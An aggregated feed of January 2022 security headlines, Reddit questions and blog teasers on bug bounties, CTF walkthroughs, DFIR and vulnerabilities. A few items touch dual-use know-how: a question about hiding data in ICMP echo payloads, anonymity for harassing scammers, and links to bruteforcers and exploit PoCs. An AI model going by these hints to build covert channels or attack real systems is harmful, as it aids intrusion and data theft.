    Some good python books for people who don't know anything about hacking but are intermediate programmers. I've read the book :- Starting out with Python, 5th Edition, ISBN : 9780135929032 submitted by /u/SufficientResident59 [link] [comments]
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question but I figured in IT most of us deal with teams or some sort of messaging. I know this also is kind of a weird thing to make a post about but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either there is no way it could be. It reminds me of when someone texts you something and add it for dramatic effect but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me but just was wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove [link] [comments]  ( 4 min )
    Resources for Compensation
    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but wont share their evidence stating the role is graded properly. It doesnt seems to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. what resources are out there to help identifying compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc). I want to bring something to them that says we are way below market and cannot be competitive but they seem to know otherwise. EDIT: Im the hiring manager for the role submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    How anonymous is a Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identify is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identify to the government but I'm not worried about. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n [link] [comments]  ( 1 min )
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, After suspicions towards my university's network provider (Eduroam), I have been digging into the extent of which they do, and/or are able to, monitor the activity of the students, while being on the network. Besides the rather normal DNS restrictions, of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning, that the certificate for a given website when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …  ( 7 min )
  • Open

    Comment trouver des prospects gratuitement ?
    Vous souhaitez construire rapidement et gratuitement une liste de prospection ? Continue reading on Medium »  ( 4 min )
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »  ( 1 min )
    Sosyal Medya OSINT
    Sosyal medya uygulamaları üzerinde kullanıcı adı ile hesap arama. Continue reading on Medium »  ( 3 min )
    SpiderFoot (Automate OSINT for Threat Intelligences)
    About SpiderFoot Continue reading on Medium »  ( 1 min )
  • Open

    Баг Баунти — заработай до 100,000 PTP
    (на момент написания статьи 100k PTP > $1м) Continue reading on Medium »  ( 1 min )
    Hacking with Subdomain3
    Subdomain3 is great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »  ( 1 min )
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, Again I’m here after a lot of texts received on my LinkedIn and Instagram that when I launch my Live Bug… Continue reading on Medium »  ( 1 min )
    How I messed up my own profile data
    Just wanted to share one of my experience which I had while testing one of the web application. I will be brief so that I do not waste… Continue reading on Medium »  ( 2 min )
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here I am a cyber security student and bug bounty hunter. Continue reading on Medium »  ( 1 min )
  • Open

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r [link] [comments]
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00 [link] [comments]
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33 [link] [comments]
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro [link] [comments]
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works [link] [comments]  ( 1 min )
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ [link] [comments]
  • Open

    SecWiki News 2022-01-19 Review
    基于上下文感知计算的APT攻击组织追踪方法 by ourren 2021年全球DDoS威胁报告 by ourren 谁动了我的DevOps:DevOps风险测绘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always on the forefront of incident responder's minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    【安全通报】Weblogic 一月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 497 个漏洞。此次修复的漏洞中包...  ( 1 min )
  • Open

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ Comments URL: https://news.ycombinator.com/item?id=29991743 Points: 235 # Comments: 70  ( 8 min )
  • Open

    2021年Linux恶意软件感染数量增长35%
    据统计,2021年内针对Linux设备的恶意软件感染数量上升了35%。  ( 1 min )
    FreeBuf早报 | 美国审查阿里巴巴云业务;美国民主党提出法案禁止网络监视广告
    时尚巨头 Moncler 证实,在 12 月被 AlphV/BlackCat 勒索软件行动窃取文件后遭遇数据泄露,并在暗网上公布。  ( 1 min )
    时尚巨头确认遭遇勒索攻击、1100万部手机已感染木马|1月19日全球网络安全热点
    <p><img src="https://image.3001.net/images/20220119/1642575002_61e7b49a7951f6c85d281.jpg!small" alt=  ( 1 min )
    网络犯罪案例分析:爬虫抢票(四十)
    开发爬虫进行抢票,非法获利12万元,触犯提供侵入、非法控制计算机信息系统程序、工具罪,判处有期徒刑三年。  ( 1 min )
    APT组织档案馆|2021年度APT组织活动态势分析
    本文为《APT组织情报研究年鉴》精华解读系列文章之一,本篇主要介绍年鉴中提到的绿盟科技2021年基于爬虫框架和知识图谱自然语言处理技术。  ( 1 min )
    美国商务部发布软件物料清单 (SBOM) 的最小元素
    定义SBOM的最小元素是一个迭代过程。本报告是起点而非定论。  ( 1 min )
    SAP 严重漏洞可导致供应链攻击
    CVE-2021-38178的CVSS 评分为9.1,其补丁在2021年10月 SAP 补丁日发布。该漏洞被描述为授权不当问题,可导致攻击者篡改传送请求,从而绕过质量门并将代码工件转移到生产系统。  ( 1 min )

  • Open

    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b [link] [comments]  ( 1 min )
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different than the stack I am accustom to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux [link] [comments]  ( 2 min )
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. Would like your opinion on whether taking notes while you learning a course like say wire shark or Linux is necessary? If no, why? If yes, what is the best way to take notes on something like one notes as I feel its difficult to take notes while watching a video. submitted by /u/aaronthecoolgnome [link] [comments]  ( 3 min )
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self signed and generated by the client. Then they send us the certificate without public key. My idea is that we store these certificates in the database. Now, I am not sure which field should I use to check authenticity of the certificate - thumbprint, subject, something else or multiple fields? I could also completely check public key in database against public key from incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric [link] [comments]  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx " work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…  ( 2 min )
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan [link] [comments]
    where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere but it seems like this should be available. submitted by /u/slnt1996 [link] [comments]  ( 1 min )
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (Hiding in the last 48 bytes of the packet, it could be more, but that could be suspicious), but can I receive data from the server? Looking at wireshark I realized the payload was the same in the reply submitted by /u/_JesusChrist_hentai [link] [comments]  ( 1 min )
    Trying to set up a isolated node on a lan network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a raspberry pi 4b so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks [link] [comments]  ( 1 min )
  • Open

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby [link] [comments]  ( 1 min )
    Check Authenticity of Zip Creation Date
    Hello guys, i need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file), later on he realized and emailed the teacher explaining the situation and attaching the right assignment (zip file) creation and modification date as a proof. The teacher says that anyone can revert the os date and zip the file resulting in unauthentic creation date of zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date is authentic. My friend uses windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007 [link] [comments]  ( 2 min )
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau [link] [comments]  ( 1 min )
  • Open

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax [link] [comments]
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma [link] [comments]
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz [link] [comments]
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea [link] [comments]
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer [link] [comments]
    Robust and blazing fast open-redirect vulnerability scanner with ability of recursevely crawling all of web-forms, entry points, or links with data.
    submitted by /u/falx1fer [link] [comments]  ( 1 min )
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs [link] [comments]
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus [link] [comments]  ( 1 min )
    An attempt to understand container runtime
    submitted by /u/alt-glitch [link] [comments]  ( 1 min )
    Public exploit POC for critical windows http RCE impacting multiple windows versions
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
    Stealing administrative JWT's through post auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher [link] [comments]
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell [link] [comments]
  • Open

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks ! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: The sizes are now displayed The links to the covers are also provided. It's useful as you may know that a book is unavailable in realtime if the cover is empty, without having to click on the book link. ​ ANNOUNCEMENT: The calibre story started 2 years ago and during this long travel another sub more focused on this kind of content has been created for some various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot ... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug [link] [comments]  ( 1 min )
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders, however the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k) (-r -np -c) and another which uses (-l0) but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else) This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. ​ I hope I've explained this well enough, please accept my apologies in advance if I haven't ! submitted by /u/prymenumba [link] [comments]  ( 2 min )
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot [link] [comments]
  • Open

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually. Continue reading on Medium »  ( 3 min )
    Solución reto #IMINT #OSINT
    Este writeup es la solución a un reto planteado por el profesor Gordon Farrer, para mí un referente en este campo y una persona de la que… Continue reading on Medium »  ( 3 min )
  • Open

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler : Tool used to gather URLs and JavaSript file locations. Continue reading on Medium »  ( 1 min )
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about bug bounty program. Continue reading on Platypus.finance »  ( 1 min )
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program Continue reading on Medium »  ( 3 min )
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery — The process of finding vulnerable endpoints; URLs, Parameters and Resources. Continue reading on Medium »  ( 5 min )
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access… Continue reading on Medium »  ( 1 min )
    Cross Site Port Attack in Wild
    Hello Hunter, Sorry for the delay of post and this is my first post in this year, I hope you’re all doing well and happy. So without… Continue reading on Medium »  ( 2 min )
  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )
  • Open

    SecWiki News 2022-01-18 Review
    以色列“飞马”间谍软件攻击事件的综合分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Go: Getting Started with Fuzzing
    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566 Points: 1 # Comments: 0  ( 11 min )
  • Open

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… Continue reading on ManoMano Tech Team »  ( 11 min )
  • Open

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo [link] [comments]
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity [link] [comments]  ( 1 min )
  • Open

    网络犯罪案例分析-12306抢票产业链
    买卖公民信息、开发注册软件,触犯侵犯公民个人信息罪和提供侵入计算机信息系统程序罪,判处有期徒刑三年,追缴违法所得。  ( 1 min )
    专访数字认证夏鲁宁:密码+云,解锁更多安全服务模式
    当传统的密码技术和热门的“云”相遇在一起,密码技术将焕发更强大的活力,给企业带来更多的优势。  ( 1 min )
    任天堂向用户发出警告,警惕虚假网站的Switch折扣
    这些网站使用官方标志来欺骗任天堂用户及粉丝,误以为这是官方页面,并以大幅折扣为诱饵,购买极有可能是“假货”的任天堂产品。
    2021年物联网设备CVE天梯榜
    作为一家专注于物联网安全的公司,统计了以下品牌部分评分较高的CVE编号以及描述等。  ( 2 min )
    研究人员在三种WordPress插件中发现高危漏洞
    WordPress安全公司Wordfence发现一项严重的漏洞,它可以作用于三种不同的WordPress插件,并已影响超过84000个网站。  ( 1 min )
    什么是SASE(安全访问服务边缘),一图看懂概念和应用场景
    这么火爆的SASE,一图看懂
    「网安知识大陆」有奖意见征集 | 一起来找“茬”
    知识大陆有奖收集意见反馈啦~  ( 1 min )
    FreeBuf早报 | Oracle在1月修复483个漏洞;Chrome 限制网站对专用网络直接访问
    2022年1月Oracle重要补丁更新 (CPU) 指出,Oracle安全更新将解决483个新的安全补丁,重要补丁更新是针对多个安全漏洞的补丁集合。  ( 1 min )
    2027 年零信任安全市场规模将达到 644 亿美元
    作为世界第二大经济体中国预计到2027年将达到111亿美元的市场规模。  ( 1 min )
    Linux环境中的三大恶意软件
    Linux系统通常部署在物联网设备中,最常见的是利用物联网设备进行DDoS攻击。其中前三大恶意软件是XorDDoS、Mirai和Mozi。  ( 1 min )
    苹果 Safari浏览器新漏洞敲响跨站用户跟踪的警钟
    防欺诈软件公司 FingerprintJS 日前披露, Safari 15中的IndexedDB API执行漏洞已经被恶意网站利用。  ( 1 min )
  • Open

    SSRF vulnerability in VMware authentication software could allow access to user
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942 Points: 3 # Comments: 0  ( 4 min )
  • Open

    IT Security in Web Anwendungen I — Injections
    Bausteine vieler Dienste dar. Insbesondere die strategische Ausrichtung vieler Unternehmen in die Cloud unterstreicht die kritische… Continue reading on Medium »  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

  • Open

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of different 2FA methods SMS was weak because you could get sim swapped Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone so it can't be taken over by hacker who gets access to your sim card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm leaning so much from you guys! Thank you! submitted by /u/iExtrapolate314 [link] [comments]
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter [link] [comments]  ( 5 min )
    How to create a rule that allows only one country with ModSecurity
    Hi all, Does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" Which is save in the rules directory as: modsecurity_crs_15_customrules.conf And I have also changed the owner of /usr/share/GeoIP/GeoIP.dat http for nginx. But the website is still getting traffic from outside of UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89 [link] [comments]  ( 1 min )
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak password tied to their applications so will be while before they're sorted out. Is this something that would be worthwhile? Any what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk [link] [comments]  ( 1 min )
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet [link] [comments]  ( 1 min )
    Can I make ensure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov [link] [comments]  ( 1 min )
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
  • Open

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic [link] [comments]  ( 1 min )
    Browser Extension for Saving Images As While Browsing
    Before you tell me to just shill for a VPS, run a crawler and some scripts; I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False Account Suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer [link] [comments]  ( 3 min )
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files if you all want to talk to me on twitter. It's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002 [link] [comments]
  • Open

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object… Continue reading on Medium »  ( 2 min )
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well certainly its you hunting down bugs but not the ones we… Continue reading on Medium »  ( 2 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. Continue reading on InfoSec Write-ups »  ( 3 min )
    IDOR leads to 2fa Bypass
    Hello Everyone my name is Arth Bajpai and , I’m back with my another writeup Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB ÇÖZÜMLERİ
    PortSwigger Web Security, web güvenliği zafiyetlerini barındıran, Owasp top 10 zafiyetlerinin yer aldığı laboratuvarlardan oluşan bir web… Continue reading on Medium »  ( 15 min )
    Jobs in Cybersecurity
    hello guys, are you excited to learn cybersecurity or ethical hacking ,You are curious about how things work and have thirst in learning… Continue reading on Medium »  ( 3 min )
    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546
  • Open

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…  ( 7 min )
  • Open

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ [link] [comments]
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
